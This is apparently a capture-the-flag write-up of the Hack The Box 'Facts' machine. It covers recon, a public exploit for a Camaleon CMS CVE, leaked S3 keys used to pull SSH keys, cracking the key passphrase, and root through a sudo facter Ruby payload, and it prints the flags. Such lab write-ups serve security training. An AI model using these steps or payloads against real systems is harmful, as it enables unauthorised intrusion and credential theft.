~/ Home Projects Tools Link
Writeups
hackthebox/
  • 2million
  • Facts
  • Checkpoint
  • Enigma
  • Nimbus
  • Reactor
  • tryhackme/
  • Wonderland
  • Highschool
  • Ignite
  • JokerCTF
  • Lazy Admin
  • Lightroom
  • Lookup
  • Love Connect
  • Love note
  • Pyrat
  • Startup
  • Tryheartme
  • Valenfind
  • Valley
  • When hearts collide
  • HTB - Facts

    ###facts.htb # # #First we recon nmap -sV -sC -v 10.129.24.212 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA) |_ 256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519) 80/tcp open http nginx 1.26.3 (Ubuntu) |_http-title: Did not follow redirect to http://facts.htb/ |_http-server-header: nginx/1.26.3 (Ubuntu) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel #Add IP to /etc/hosts echo '10.129.24.212 facts.htb' >> /etc/hosts #Started exploring the webpage #Ran ffuf to fuzz from facts.htb/ recursively ffuf -w /usr/share/SecLists/Discovery/Web-Content/common.txt:FUZZ -u http://facts.htb/FUZZ #Found http://facts.htb/admin/login #Seems like this login page could be a way in #Browsing around: Made an account: My profile #ID is 5, implying #ID 0 or 1 #Made a signature testing PHP, JS, HTML: Everything is escaped #Can upload a picture to account: Could craft malicious images and test cmd injection #initial phpshell returns ERROR: Internal Server Error User Image #Started looking for CVEs with Camaleon v.2.9.0 CVE-2025-2304 with POC @ https://github.com/the8frust/CVE-2025-2304 #On attacker: git clone https://github.com/the8frust/CVE-2025-2304 python3 ./exploit.py -t TARGET -u USERNAME -p PASSWORD #We now have elevated privilege #AWS S3 ACCESS KEY AKIA6D05E07B2281C56E #AWS S3 SECRET KEY GrbC9oYbnuxNlyZKPt9HwZoZWIGCAffEvA+kfnyO #Went back looking for another CVE #Installed awscli tools #and found some sshkeys and downloaded with aws s3 sync s3://internal/.ssh ./keys --endpoint-url http://facts.htb:54321 --profile facts #turned the id_ed25519 key to an appropriate formate ssh2john id_ed25519 > key.john #Ran johntheripper with rockyou john path/to/key.john -w /usr/share/wordlists/rockyou.txt #We got a hit the password is: dragonballz #Now we can connect using the key and password ssh -i id_ed25519 trivia@10.129.24.212 passphrase: dragonballz #Went to grab the user flag in /home/william/ 295de471a20fc999c70cb71ba398815b #sudo -l revealed (ALL) NOPASSWD: /usr/bin/facter #Looking into Facter gathers information on various hardware/OS related #Its possible to add custom dir to add new ruby scripts #1st we make a ruby script calling /bin/bash through Facter #Payload: Facter.add(:this) do system("/bin/bash") end #Next we run Facter with our new directory containing our payload sudo /usr/bin/facter --custom-dir /tmp/beb/this.rb #We get a root shell #cat /root/root.txt fc3262c096014f37fb1633342364d71e